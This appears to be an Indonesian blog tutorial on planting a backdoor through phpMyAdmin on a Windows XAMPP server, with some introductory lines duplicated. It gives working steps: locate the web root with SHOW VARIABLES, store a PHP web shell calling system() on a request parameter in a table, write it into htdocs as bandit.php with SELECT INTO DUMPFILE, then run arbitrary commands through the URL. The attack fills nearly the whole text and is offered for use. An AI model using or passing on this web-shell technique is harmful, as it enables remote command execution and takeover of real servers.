Phpmyadmin adalah perangkat lunak bebas (Open source) yang ditulis dalam bahasa pemrograman php untuk menangani administrasi Mysql.
Disini saya akan mencoba menerangkan tentang Backdoor via phpmyadmin pada webserver windows secara rinci!!
Yang pasti percobaan lewat localhost di windows…saya menggunakan XAMPP dan phpmyadmin 2.11.4!!
Buka phpmyadminnya dengan URL
http://localhost/phpmyadmin
Setelah terbuka tampilan phpmyadmin, dan klik pada tab SQL / seperti pada telunjuk icon di bawah (query Window)
Disini saya akan mencoba menerangkan tentang Backdoor via phpmyadmin pada webserver windows secara rinci!!
Yang pasti percobaan lewat localhost di windows…saya menggunakan XAMPP dan phpmyadmin 2.11.4!!
Buka phpmyadminnya dengan URL
http://localhost/phpmyadmin
Setelah terbuka tampilan phpmyadmin, dan klik pada tab SQL / seperti pada telunjuk icon di bawah (query Window)
Kemudian akan muncul tampilan query window pada phpmyadmin tersebut.
Masukan perintah
SHOW VARIABLES
“SHOW VARIABLES = Untuk mengetahui Base Dir / Direktori pada webserver tersebut”
Nanti pada Variable_name ada basedir (Letak Direktori Servernya)
Keterangan Gambar:
Webserver tersebut terdapat pada Direktori E: ,dan pada Folder server
Untuk lebih jelas mengetahui versi mySQL dan OS nya Lihat paling bawah
Mulai dech…
Create Database:
belajar
Kemudian pada Database : belajar , ada tab SQL seperti gambar di bawah ini
Dan masukan perintah di bawah pada text area!!
CREATE TABLE iseng(
dor TEXT) TYPE=MYISaM;
INSERT INTO iseng(dor)
VALUES(
'<pre><body bgcolor=silver ><? @system($_REQUEST["cmd"]); ?></body></pre>');
Keterangan perintah di atas:
Membuat table “iseng” dan membuat field “dor” dengan type “text” sedangkan MyISAM adalah tipe tabel default dalam MySQL dan isi text tesebut adalah “ <? @system($_REQUEST["cmd"]); ?>“ itu adalah perintah untuk request ke system menggunakan bahasa PHP
Setelah itu klik pada tab SQL lagi, masukan perintah ini
select * into dumpfile 'E:/server/htdocs/bandit.php' from iseng;
keterangan perintah di atas adalah :
kita coba dump sebuah file ke Direktori E: pada folder server dan htdocs adalah direktori yang akan ditampilkan oleh web server (Localhost)
Selesai, Ketik URL :
http://localhost/bandit.php?cmd=cmd
Selanjutnya terserah anda
Dengan menggunakan perintah-perintah CMD pada windows!!!
Note: perintah-perintah CMD yang anda masukan harus seperti ini “/bandit.php?cmd=perintah_CMD”
------------------------------------------------------------------patch------------------------------------------------------------------------
0 komentar:
Posting Komentar